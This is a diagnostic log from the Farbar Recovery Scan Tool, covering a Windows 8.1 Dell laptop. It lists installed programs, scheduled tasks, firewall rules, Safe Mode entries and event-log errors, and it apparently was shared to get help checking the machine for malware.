2016-06-10 03:07 - 2016-06-10 03:07 - 00085232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vcruntime140.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-06 19:38 - 2015-06-07 15:19 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-07-06 19:34 - 2014-11-21 06:42 - 00863592 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-06 19:34 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2016-07-06 19:28 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-06 19:28 - 2013-08-22 16:44 - 00518000 _____ C:\Windows\system32\FNTCACHE.DAT
2016-07-06 19:27 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-07-06 19:26 - 2015-08-31 12:52 - 00000000 ____D C:\Users\Melinda\AppData\LocalLow\Temp
2016-07-06 18:43 - 2015-06-07 14:56 - 00000000 ____D C:\ProgramData\CyberLink
2016-07-06 16:18 - 2015-06-07 15:15 - 00000000 ____D C:\ProgramData\McAfee
2016-07-06 14:48 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2016-07-06 14:47 - 2013-08-22 17:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-07-06 14:19 - 2015-06-07 15:14 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-07-06 13:16 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-07-06 11:19 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\rescache
2016-07-06 09:06 - 2015-06-07 15:13 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-07-06 09:06 - 2015-06-07 15:07 - 00000000 ____D C:\Program Files\Dell
2016-07-06 08:17 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-07-06 08:16 - 2013-08-22 17:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-07-06 08:16 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-07-06 08:08 - 2015-06-07 17:10 - 00000000 ____D C:\ProgramData\Dell
2016-07-06 07:52 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\Dell Update
2016-07-06 07:51 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2016-07-06 06:40 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-07-06 06:34 - 2015-06-07 15:13 - 00000000 ____D C:\ProgramData\PCDr
2016-07-06 06:29 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda
2016-07-06 06:29 - 2015-06-07 15:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-07-06 02:50 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\Web
2016-07-05 09:51 - 2015-08-15 13:44 - 00000000 ____D C:\Users\Melinda\AppData\Local\Packages

==================== Files in the root of some directories =======

2015-06-07 14:43 - 2015-06-07 14:43 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-06-07 15:02 - 2015-06-07 15:02 - 0000121 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log
2015-06-07 14:57 - 2015-06-07 14:58 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
2015-06-07 14:58 - 2015-06-07 15:00 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log
2015-06-07 15:00 - 2015-06-07 15:02 - 0000108 _____ () C:\ProgramData\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}.log
2015-06-07 14:56 - 2015-06-07 14:57 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

ATTENTION: ==> Could not access BCD.

LastRegBack: 2016-07-06 08:47

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by Melinda (2016-07-06 20:04:15)
Running from C:\Users\Melinda\Desktop
Windows 8.1 Single Language (Update) (X64) (2015-06-07 13:37:40)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3305678368-1645044794-3837945535-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-3305678368-1645044794-3837945535-501 - Limited - Disabled)
Melinda (S-1-5-21-3305678368-1645044794-3837945535-1001 - Administrator - Enabled) => C:\Users\Melinda

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.016.20039 - Adobe Systems Incorporated)
Amazon 1Button App (HKLM-x32\...\{0A7D6F3C-F2AB-48ED-BE23-99791BFF87D6}) (Version: 1.0.0.4 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Amazon Kindle) (Version:  - Amazon)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 10.0 - CyberLink Corp.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{2A07BB79-284C-4C61-B8D5-4E146FAC91FB}) (Version: 1.0.0.8 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{AE5E3C86-2633-4DAF-A7F4-C43D1E738BAE}) (Version: 3.1.3300.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{17FFE63C-6734-4950-B488-134B5A2505F7}) (Version: 2.04.0280 - Aviata Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.1.34.40 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 0.9.0 - Dropbox, Inc.)
DSC/AA Factory Installer (Version: 3.5.6426.22 - PC-Doctor, Inc.) Hidden
DW WLAN Card (HKLM\...\DW WLAN Card) (Version: 6.30.223.249 - Dell Inc.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3945 - Intel Corporation)
McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 14.0.9042 - McAfee, Inc.)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.6965.2058 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
My Dell Learning Center (HKLM\...\{DC451A89-545E-4297-AC2C-9F239CE7D695}) (Version: 1.0.510.0 - Dell Inc.)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.18 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9600.39054 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7288 - Realtek Semiconductor Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{C6D9ED03-6FCF-4410-9CB7-45CA285F9E11}) (Version: 12.0.0.9980 - Broadcom Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll => No Fil (the data entry has 1 more characters).
CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe => No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08FAB16F-38D1-41A7-A96A-27901C8DACFA} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-07-06] (McAfee, Inc.)
Task: {2362FB59-156D-4BDE-BDE5-26155C688609} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-07-05] (Realtek Semiconductor)
Task: {31B9C7D7-07AF-4C60-8D5C-22F4E164D916} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {35276823-28FA-4B1D-A581-AEFDA66847C0} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-22] (CyberLink Corp.)
Task: {371AA7E5-B4A6-48B8-8F37-50DE4E85E7F0} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-07-06] (McAfee, Inc.)
Task: {3758DF87-0E29-486A-9D29-63718D338695} - System32\Tasks\Dell\Dell Product Registration Update => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {3F26D171-C361-4616-B754-E0147B333FF5} - System32\Tasks\Dell\Dell Product Registration => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {583C724D-DC81-4886-9B12-752F09269FF2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\mcafee\platform\McUICnt.exe [2016-04-23] (McAfee, Inc.)
Task: {6FE5AA89-8DE2-40BA-B60E-9AED6F64693F} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7FFABFC7-6E75-48D4-80F9-F8C8DD52D5AF} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {8746F630-AB2F-4E58-A6FB-10BF265BF8C4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-04-22] (Adobe Systems Incorporated)
Task: {945473E0-878B-46DC-B517-7309904670DE} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {9AB09B0D-E28A-4778-9000-7C93877ABF69} - System32\Tasks\{A79AE70B-3222-4200-AA0C-607D18CAF9F8} => pcalua.exe -a "C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" -c scenario=install scenariosubtype=uninstall baseurl="C:\Program Files\Microsoft Office 15" platform=x86 version=15.0.4833.1001 culture=en-us productstoremove=O365HomePremRetail_en-us_x-none
Task: {B3BEE599-13E1-4D78-AAD7-3C40ADE7E7AD} - System32\Tasks\Aviata\PowerRegister\Dell Reminder (Melinda) => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {B4B694C2-6A51-4D72-BA7B-BEEBAD2B8856} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-03-05] (CyberLink)
Task: {DA28AAC1-0DC1-4DFD-ACF4-024C75A6E47E} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {DAD9A46E-5BFD-410F-AD1B-5979F02CE72D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {DD6537A5-A686-4071-B1C0-3AB7EE5B2110} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-31] (McAfee, Inc.)
Task: {EC51E01A-E785-4E5F-848B-388C16A74DCC} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-01-10] (Synaptics Incorporated)
Task: {FFE8401F-7883-442B-944A-693A8A7FE7B7} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-09-24 22:20 - 2014-09-24 22:20 - 00049408 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btwleapi.dll
2016-07-06 14:28 - 2016-07-06 14:28 - 08919752 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00462160 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
2015-01-22 23:37 - 2015-01-22 23:37 - 00022528 _____ () C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
2015-01-22 23:37 - 2015-01-22 23:37 - 06032384 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.BeautyShot.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00045568 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.ContentManager.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017408 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00009728 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Configuration.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017920 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00006656 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Configuration.dll
2015-06-07 14:58 - 2013-03-05 05:40 - 00626240 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-03-05 18:41 - 2013-03-05 18:41 - 00015424 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00214352 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\Ledger.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00114000 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\zlib1.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2015-06-07 15:06 - 2013-12-10 17:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-01-05 19:17 - 2015-12-19 01:52 - 01607920 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-06-07 15:20 - 2012-11-26 05:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-06-07 15:19 - 2014-02-18 21:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\dell\BlueLava_1112000xx_inspiron_wallpaper58095_16x9_72dpi_RGB.jpg
DNS Servers: 192.168.43.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{4C08EABD-F39F-4DFE-BC62-A885074076A0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B1AEF5A5-BC60-420F-91A2-C4667097F18D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD Cinema\PowerDVDCinema12.exe
FirewallRules: [{19E3C5FD-7368-411F-B10B-7BEF913EB8AE}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{B3B5A316-3040-4953-B2BE-76A614395690}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{D7B1A2E0-AA3B-4786-B557-351B04116EEE}] => (Allow) C:\Users\Melinda\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{D8426297-B91F-4EA5-B90C-961F0D036FEF}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{453DE781-1C77-4A11-9241-94E64E7C2586}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{15B1885B-E1A4-4E9F-95EE-072770B3A83F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{01D1F782-0259-4566-A237-B192FAF6E7F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{13FB821E-9FEE-4A0F-8DE3-9387CB447704}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC9FA691-E063-4647-BC4A-4767178AC238}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{A75DB17C-A945-438F-ACCF-FF579716F5F1}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{F7E58AA9-6B4D-41E1-BDAC-75A0FC8DA9BD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F9AEAE24-EC5B-4EB5-A672-C5E2F0DC979A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B00CC2B1-DB54-432A-A099-3EE6AC06DCA0}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A6643D8F-FF92-4964-AC6A-905B1D49FF70}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{6566F34D-CE0D-46FA-8939-42F3C461B65E}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [{58CDD88C-012F-47C2-8B07-68319DE5DB71}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [TCP Query User{161CA715-DC23-4B44-B509-22AAE82DD6FB}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [UDP Query User{CBF9CD12-1F76-4583-AA64-B05AFF1110F8}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [{59F538D1-BD40-4AAD-8FAC-ABA0A4531DE0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{D777539B-2BA0-4B86-9B02-67EC1BD7FEF0}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4610417F-63B7-47E2-8499-00D1BD39C1A1}] => (Allow) LPort=17061
FirewallRules: [{4FA72F00-0BC4-4FB5-9F0A-3424AA44D5B6}] => (Allow) LPort=17061
FirewallRules: [{8343E0A9-1541-4C05-8336-8E24C926455D}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{1D0FED7E-B603-43E3-B728-90DE466D8BF1}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{B448FF33-50E1-430E-A442-F801742453A7}] => (Allow) C:\Windows\system32\rundll32.exe

==================== Restore Points =========================

06-07-2016 11:10:41 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (07/06/2016 07:23:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17416 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: cec

Start Time: 01d1d7aad9017ea7

Termination Time: 31

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id: 63c44cca-439e-11e6-8257-acd1b8d216c6

Faulting package full name:

Faulting package-relative application ID:

Error: (07/06/2016 02:56:58 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:58 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:16 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=KHGM9
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:16 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=KHGM9
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:05 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:05 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:55:20 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:55:20 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:55:18 PM) (Source: Microsoft Office 16) (EventID: 2011) (User: )
Description: Office Subscription licensing exception: Error Code: 0x803D0014; CorrelationId: {8DC124C2-B55D-4871-8311-D58C4529C826}

System errors:
=============
Error: (07/06/2016 07:29:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee OOBE Service2 service failed to start due to the following error:
%%1083 = The executable program that this service is configured to run in does not implement the service.

Error: (07/06/2016 05:22:34 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
